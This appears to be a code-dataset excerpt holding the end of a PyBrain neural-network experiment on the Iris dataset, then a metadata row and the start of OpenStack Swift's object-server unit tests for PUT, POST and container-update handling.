[[5.5, 2.5, 4.0, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.5, 2.6, 4.4, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[6.1, 3.0, 4.6, 1.4], [0, 1, 0], [1], ['Iris-versicolor']], [[5.8, 2.6, 4.0, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.0, 2.3, 3.3, 1.0], [0, 1, 0], [1], ['Iris-versicolor']], [[5.6, 2.7, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 3.0, 4.2, 1.2], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.9, 4.2, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.2, 2.9, 4.3, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[5.1, 2.5, 3.0, 1.1], [0, 1, 0], [1], ['Iris-versicolor']], [[5.7, 2.8, 4.1, 1.3], [0, 1, 0], [1], ['Iris-versicolor']], [[6.3, 3.3, 6.0, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.1, 3.0, 5.9, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.9, 5.6, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.8, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.6, 3.0, 6.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[4.9, 2.5, 4.5, 1.7], [0, 0, 1], [2], ['Iris-virginica']], [[7.3, 2.9, 6.3, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 2.5, 5.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.6, 6.1, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.2, 5.1, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.7, 5.3, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.0, 5.5, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[5.7, 2.5, 5.0, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.8, 5.1, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.2, 5.3, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.8, 6.7, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.6, 6.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 2.2, 5.0, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.2, 5.7, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.6, 2.8, 4.9, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 2.8, 6.7, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.7, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.2, 6.0, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 2.8, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 3.0, 4.9, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[7.2, 3.0, 5.8, 1.6], [0, 0, 1], [2], ['Iris-virginica']], [[7.4, 2.8, 6.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[7.9, 3.8, 6.4, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 2.8, 5.6, 2.2], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.8, 5.1, 1.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.1, 2.6, 5.6, 1.4], [0, 0, 1], [2], ['Iris-virginica']], [[7.7, 3.0, 6.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 3.4, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.4, 3.1, 5.5, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.0, 3.0, 4.8, 1.8], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.4, 2.1], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.1, 5.6, 2.4], [0, 0, 1], [2], ['Iris-virginica']], [[6.9, 3.1, 5.1, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.8, 2.7, 5.1, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.8, 3.2, 5.9, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.3, 5.7, 2.5], [0, 0, 1], [2], ['Iris-virginica']], [[6.7, 3.0, 5.2, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[6.3, 2.5, 5.0, 1.9], [0, 0, 1], [2], ['Iris-virginica']], [[6.5, 3.0, 5.2, 2.0], [0, 0, 1], [2], ['Iris-virginica']], [[6.2, 3.4, 5.4, 2.3], [0, 0, 1], [2], ['Iris-virginica']], [[5.9, 3.0, 5.1, 1.8], [0, 0, 1], [2], ['Iris-virginica']]]
alldata = ClassificationDataSet(4, 1, nb_classes=3,
class_labels=['set', 'vers', 'virg'])
for p in pat:
t = p[2]
alldata.addSample(p[0], t)
tstdata, trndata = alldata.splitWithProportion(0.33)
trndata._convertToOneOfMany()
tstdata._convertToOneOfMany()
return trndata, tstdata
"""
Although output layer should be binary with threshold bias layer of 0.5
and input layer should be tanh
"""
def createNN(indim, hiddim, outdim):
nn = buildNetwork(indim, hiddim, outdim,
bias=False,
hiddenclass=TanhLayer,
outclass=ThresholdLayer)
nn.sortModules()
return nn
def associateAstrocyteLayers(nn):
in_to_hidden, = nn.connections[nn['in']]
hidden_to_out, = nn.connections[nn['hidden0']]
hiddenAstrocyteLayer = AstrocyteLayer(nn['hidden0'], in_to_hidden)
outputAstrocyteLayer = AstrocyteLayer(nn['out'], hidden_to_out)
return hiddenAstrocyteLayer, outputAstrocyteLayer
repeats = 3
iterations = 500
all_trn_results = []
all_tst_results = []
def trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer):
inputs = list(trndata['input'])
random.shuffle(inputs)
for inpt in trndata['input']:
nn.activate(inpt)
for m in range(hiddenAstrocyteLayer.astrocyte_processing_iters):
hiddenAstrocyteLayer.update()
outputAstrocyteLayer.update()
hiddenAstrocyteLayer.reset()
outputAstrocyteLayer.reset()
def main():
trndata, tstdata = createDS()
for repeat in xrange(repeats):
print 'trial', repeat
iter_trn_results = []
iter_tst_results = []
nn = createNN(4, 6, 3)
nn.randomize()
hiddenAstrocyteLayer, outputAstrocyteLayer = \
associateAstrocyteLayers(nn)
trainer = BackpropTrainer(nn, dataset=trndata, learningrate=0.01,
momentum=0.1, verbose=False, weightdecay=0.0)
for grand_iter in xrange(iterations):
if grand_iter == 0:
trainer.train()
# trainNGA(nn, trndata, hiddenAstrocyteLayer, outputAstrocyteLayer)
trainer.train()
trnresult = percentError(trainer.testOnClassData(),
trndata['class'])
iter_trn_results.append(trnresult)
tstresult = percentError(trainer.testOnClassData(dataset=tstdata),
tstdata['class'])
iter_tst_results.append(tstresult)
if not grand_iter % 100:
print 'epoch %4d' % trainer.totalepochs, 'train error %5.2f%%'\
% trnresult, 'test error %5.2f%%' % tstresult
# MAKE SURE NOT IN ITER LOOP
all_trn_results.append(iter_trn_results)
all_tst_results.append(iter_tst_results)
assert array(iter_trn_results).shape == (iterations, ), \
array(iter_trn_results).shape
assert array(iter_tst_results).shape == (iterations, ), \
array(iter_tst_results).shape
assert array(all_trn_results).shape == (repeats, iterations), \
array(all_trn_results).shape
assert array(all_tst_results).shape == (repeats, iterations), \
array(all_tst_results).shape
a = datetime.datetime.now(). utctimetuple()
time_string = str(a[3]) + str(a[4]) + '_' + str(a[2]) + '-' + \
str(a[1]) + '-' + str(a[0])
if os.environ['OS'] == 'Windows_NT':
sep = '\\'
else:
sep = '/'
pybrain_dir = os.getcwd() + sep
assert pybrain_dir[-10:-1] == 'mypybrain', \
'is actually this ' + pybrain_dir[-10:-1]
os.mkdir(pybrain_dir + 'experiment_results' + sep + time_string)
trnf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_trn_results.out', 'w')
np.savetxt(trnf, all_trn_results)
tstf = open(pybrain_dir + 'experiment_results' + sep + time_string +
'/all_tst_results.out', 'w')
np.savetxt(tstf, all_tst_results)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
a0c8ab45ee293002eb2896412bc5d8ad46314948 | f62fd455e593a7ad203a5c268e23129473d968b6 | /swift-2.13.1/test/unit/obj/test_server.py | 03e40a730d03da0616400cb61955cb0a5ba0eec7 | [
"Apache-2.0"
] | permissive | MinbinGong/OpenStack-Ocata | 5d17bcd47a46d48ff9e71e2055f667836174242f | 8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3 | refs/heads/master | 2021-06-23T05:24:37.799927 | 2017-08-14T04:33:05 | 2017-08-14T04:33:05 | 99,709,985 | 0 | 2 | null | 2020-07-22T22:06:22 | 2017-08-08T15:48:44 | Python | UTF-8 | Python | false | false | 340,294 | py | # coding: utf-8
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.obj.server"""
import six.moves.cPickle as pickle
import datetime
import json
import errno
import operator
import os
import mock
import six
from six import StringIO
import unittest
import math
import random
from shutil import rmtree
from time import gmtime, strftime, time, struct_time
from tempfile import mkdtemp
from hashlib import md5
import tempfile
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from eventlet import sleep, spawn, wsgi, Timeout, tpool, greenthread
from eventlet.green import httplib
from nose import SkipTest
from swift import __version__ as swift_version
from swift.common.http import is_success
from test import listen_zero
from test.unit import FakeLogger, debug_logger, mocked_http_conn, \
make_timestamp_iter, DEFAULT_TEST_EC_TYPE
from test.unit import connect_tcp, readuntil2crlfs, patch_policies, \
encode_frag_archive_bodies
from swift.obj import server as object_server
from swift.obj import updater
from swift.obj import diskfile
from swift.common import utils, bufferedhttp
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.utils import hash_path, mkdirs, normalize_timestamp, \
NullLogger, storage_directory, public, replication, encode_timestamps, \
Timestamp
from swift.common import constraints
from swift.common.swob import Request, WsgiBytesIO
from swift.common.splice import splice
from swift.common.storage_policy import (StoragePolicy, ECStoragePolicy,
POLICIES, EC_POLICY)
from swift.common.exceptions import DiskFileDeviceUnavailable, \
DiskFileNoSpace, DiskFileQuarantined
from swift.common.wsgi import init_request_processor
def mock_time(*args, **kwargs):
return 5000.0
test_policies = [
StoragePolicy(0, name='zero', is_default=True),
ECStoragePolicy(1, name='one', ec_type=DEFAULT_TEST_EC_TYPE,
ec_ndata=10, ec_nparity=4),
]
@contextmanager
def fake_spawn():
"""
Spawn and capture the result so we can later wait on it. This means we can
test code executing in a greenthread but still wait() on the result to
ensure that the method has completed.
"""
greenlets = []
def _inner_fake_spawn(func, *a, **kw):
gt = greenthread.spawn(func, *a, **kw)
greenlets.append(gt)
return gt
object_server.spawn = _inner_fake_spawn
with mock.patch('swift.obj.server.spawn', _inner_fake_spawn):
try:
yield
finally:
for gt in greenlets:
gt.wait()
@patch_policies(test_policies)
class TestObjectController(unittest.TestCase):
"""Test swift.obj.server.ObjectController"""
def setUp(self):
"""Set up for testing swift.object.server.ObjectController"""
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
self.tmpdir = mkdtemp()
self.testdir = os.path.join(self.tmpdir,
'tmp_test_object_server_ObjectController')
mkdirs(os.path.join(self.testdir, 'sda1'))
self.conf = {'devices': self.testdir, 'mount_check': 'false',
'container_update_timeout': 0.0}
self.object_controller = object_server.ObjectController(
self.conf, logger=debug_logger())
self.object_controller.bytes_per_sync = 1
self._orig_tpool_exc = tpool.execute
tpool.execute = lambda f, *args, **kwargs: f(*args, **kwargs)
self.df_mgr = diskfile.DiskFileManager(self.conf,
self.object_controller.logger)
self.logger = debug_logger('test-object-controller')
self.ts = make_timestamp_iter()
self.ec_policies = [p for p in POLICIES if p.policy_type == EC_POLICY]
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
rmtree(self.tmpdir)
tpool.execute = self._orig_tpool_exc
def _stage_tmp_dir(self, policy):
mkdirs(os.path.join(self.testdir, 'sda1',
diskfile.get_tmp_dir(policy)))
def iter_policies(self):
for policy in POLICIES:
self.policy = policy
yield policy
def check_all_api_methods(self, obj_name='o', alt_res=None):
path = '/sda1/p/a/c/%s' % obj_name
body = 'SPECIAL_STRING'
op_table = {
"PUT": (body, alt_res or 201, ''), # create one
"GET": ('', alt_res or 200, body), # check it
"POST": ('', alt_res or 202, ''), # update it
"HEAD": ('', alt_res or 200, ''), # head it
"DELETE": ('', alt_res or 204, '') # delete it
}
for method in ["PUT", "GET", "POST", "HEAD", "DELETE"]:
in_body, res, out_body = op_table[method]
timestamp = normalize_timestamp(time())
req = Request.blank(
path, environ={'REQUEST_METHOD': method},
headers={'X-Timestamp': timestamp,
'Content-Type': 'application/x-test'})
req.body = in_body
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, res)
if out_body and (200 <= res < 300):
self.assertEqual(resp.body, out_body)
def test_REQUEST_SPECIAL_CHARS(self):
obj = 'special昆%20/%'
self.check_all_api_methods(obj)
def test_device_unavailable(self):
def raise_disk_unavail(*args, **kwargs):
raise DiskFileDeviceUnavailable()
self.object_controller.get_diskfile = raise_disk_unavail
self.check_all_api_methods(alt_res=507)
def test_allowed_headers(self):
dah = ['content-disposition', 'content-encoding', 'x-delete-at',
'x-object-manifest', 'x-static-large-object']
conf = {'devices': self.testdir, 'mount_check': 'false',
'allowed_headers': ','.join(['content-length'] + dah)}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.assertEqual(self.object_controller.allowed_headers, set(dah))
def test_POST_update_meta(self):
# Test swift.obj.server.ObjectController.POST
original_headers = self.object_controller.allowed_headers
test_headers = 'content-encoding foo bar'.split()
self.object_controller.allowed_headers = set(test_headers)
put_timestamp = normalize_timestamp(time())
headers = {'X-Timestamp': put_timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'Baz': 'bazheader',
'X-Object-Sysmeta-Color': 'blue',
'X-Object-Transient-Sysmeta-Shape': 'circle',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'}
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
req.body = 'VERIFY'
etag = '"%s"' % md5('VERIFY').hexdigest()
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'Etag': etag,
})
post_timestamp = normalize_timestamp(time())
headers = {'X-Timestamp': post_timestamp,
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Content-Encoding': 'gzip',
'Foo': 'fooheader',
'Bar': 'barheader',
'Content-Type': 'application/x-test'}
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers=headers)
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'blue',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
expected_headers = {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'blue',
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Foo': 'fooheader',
'Bar': 'barheader',
'Content-Encoding': 'gzip',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
}
self.assertEqual(dict(resp.headers), expected_headers)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), expected_headers)
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'X-Object-Sysmeta-Color': 'red',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'blue',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'blue',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
# test defaults
self.object_controller.allowed_headers = original_headers
put_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'Content-Type': 'application/x-test',
'Foo': 'fooheader',
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-1': 'One',
'X-Object-Manifest': 'c/bar',
'Content-Encoding': 'gzip',
'Content-Disposition': 'bar',
'X-Static-Large-Object': 'True',
})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'Etag': etag,
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-1': 'One',
'Content-Encoding': 'gzip',
'X-Object-Manifest': 'c/bar',
'Content-Disposition': 'bar',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': put_timestamp,
'X-Timestamp': put_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(put_timestamp)))),
})
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'X-Object-Meta-3': 'Three',
'Foo': 'fooheader',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'red',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-3': 'Three',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
# Test for empty metadata
post_timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': post_timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-3': ''})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': str(len(resp.body)),
'X-Object-Sysmeta-Color': 'red',
})
req = Request.blank('/sda1/p/a/c/o')
resp = req.get_response(self.object_controller)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'application/x-test',
'Content-Length': '6',
'Etag': etag,
'X-Object-Sysmeta-Color': 'red',
'X-Object-Meta-3': '',
'X-Static-Large-Object': 'True',
'X-Backend-Timestamp': post_timestamp,
'X-Timestamp': post_timestamp,
'X-Backend-Data-Timestamp': put_timestamp,
'X-Backend-Durable-Timestamp': put_timestamp,
'Last-Modified': strftime(
'%a, %d %b %Y %H:%M:%S GMT',
gmtime(math.ceil(float(post_timestamp)))),
})
def test_POST_old_timestamp(self):
ts = time()
orig_timestamp = utils.Timestamp(ts).internal
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': orig_timestamp,
'Content-Type': 'application/x-test',
'X-Object-Meta-1': 'One',
'X-Object-Meta-Two': 'Two'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# Same timestamp should result in 409
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': orig_timestamp,
'X-Object-Meta-3': 'Three',
'X-Object-Meta-4': 'Four',
'Content-Encoding': 'gzip',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
# Earlier timestamp should result in 409
timestamp = normalize_timestamp(ts - 1)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-5': 'Five',
'X-Object-Meta-6': 'Six',
'Content-Encoding': 'gzip',
'Content-Type': 'application/x-test'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_POST_conflicts_with_later_POST(self):
t_put = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': t_put,
'Content-Length': 0,
'Content-Type': 'plain/text'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
t_post1 = next(self.ts).internal
t_post2 = next(self.ts).internal
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post2})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t_post1})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
obj_dir = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(0), 'p',
hash_path('a', 'c', 'o')))
ts_file = os.path.join(obj_dir, t_post2 + '.meta')
self.assertTrue(os.path.isfile(ts_file))
meta_file = os.path.join(obj_dir, t_post1 + '.meta')
self.assertFalse(os.path.isfile(meta_file))
def test_POST_not_exist(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c/fail',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
def test_POST_invalid_path(self):
timestamp = normalize_timestamp(time())
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp,
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_bad_timestamp(self):
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': 'bad',
'X-Object-Meta-1': 'One',
'X-Object-Meta-2': 'Two',
'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_POST_container_connection(self):
# Test that POST does call container_update and returns success
# whether update to container server succeeds or fails
def mock_http_connect(calls, response, with_exc=False):
class FakeConn(object):
def __init__(self, calls, status, with_exc):
self.calls = calls
self.status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.with_exc = with_exc
def getresponse(self):
calls[0] += 1
if self.with_exc:
raise Exception('test')
return self
def read(self, amt=None):
return ''
return lambda *args, **kwargs: FakeConn(calls, response, with_exc)
ts = time()
timestamp = normalize_timestamp(ts)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Type': 'text/plain',
'Content-Length': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 1),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 202)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 2),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new1'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 202, with_exc=True)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(ts + 3),
'X-Container-Host': '1.2.3.4:0',
'X-Container-Partition': '3',
'X-Container-Device': 'sda1',
'X-Container-Timestamp': '1',
'Content-Type': 'application/new2'})
calls = [0]
with mock.patch.object(object_server, 'http_connect',
mock_http_connect(calls, 500)):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
def _test_POST_container_updates(self, policy, update_etag=None):
# Test that POST requests result in correct calls to container_update
t = [next(self.ts) for _ in range(0, 5)]
calls_made = []
update_etag = update_etag or '098f6bcd4621d373cade4e832627b4f6'
def mock_container_update(ctlr, op, account, container, obj, request,
headers_out, objdevice, policy):
calls_made.append((headers_out, policy))
body = 'test'
headers = {
'X-Timestamp': t[1].internal,
'Content-Type': 'application/octet-stream;swift_bytes=123456789',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
# EC fragments will typically have a different size to the body and
# for small bodies the fragments may be longer. For this test all
# that matters is that the fragment and body lengths differ.
body = body + 'ec_overhead'
headers['X-Backend-Container-Update-Override-Etag'] = update_etag
headers['X-Backend-Container-Update-Override-Size'] = '4'
headers['X-Object-Sysmeta-Ec-Etag'] = update_etag
headers['X-Object-Sysmeta-Ec-Content-Length'] = '4'
headers['X-Object-Sysmeta-Ec-Frag-Index'] = 2
headers['Content-Length'] = str(len(body))
req = Request.blank('/sda1/p/a/c/o', body=body,
environ={'REQUEST_METHOD': 'PUT'},
headers=headers)
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(1, len(calls_made))
expected_headers = HeaderKeyDict({
'x-size': '4',
'x-content-type': 'application/octet-stream;swift_bytes=123456789',
'x-timestamp': t[1].internal,
'x-etag': update_etag})
self.assertDictEqual(expected_headers, calls_made[0][0])
self.assertEqual(policy, calls_made[0][1])
# POST with no metadata newer than the data should return 409,
# container update not expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[0].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 409)
self.assertEqual(resp.headers['x-backend-timestamp'],
t[1].internal)
self.assertEqual(0, len(calls_made))
# POST with newer metadata returns success and container update
# is expected
calls_made = []
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': t[3].internal,
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch('swift.obj.server.ObjectController.container_update',
mock_container_update):
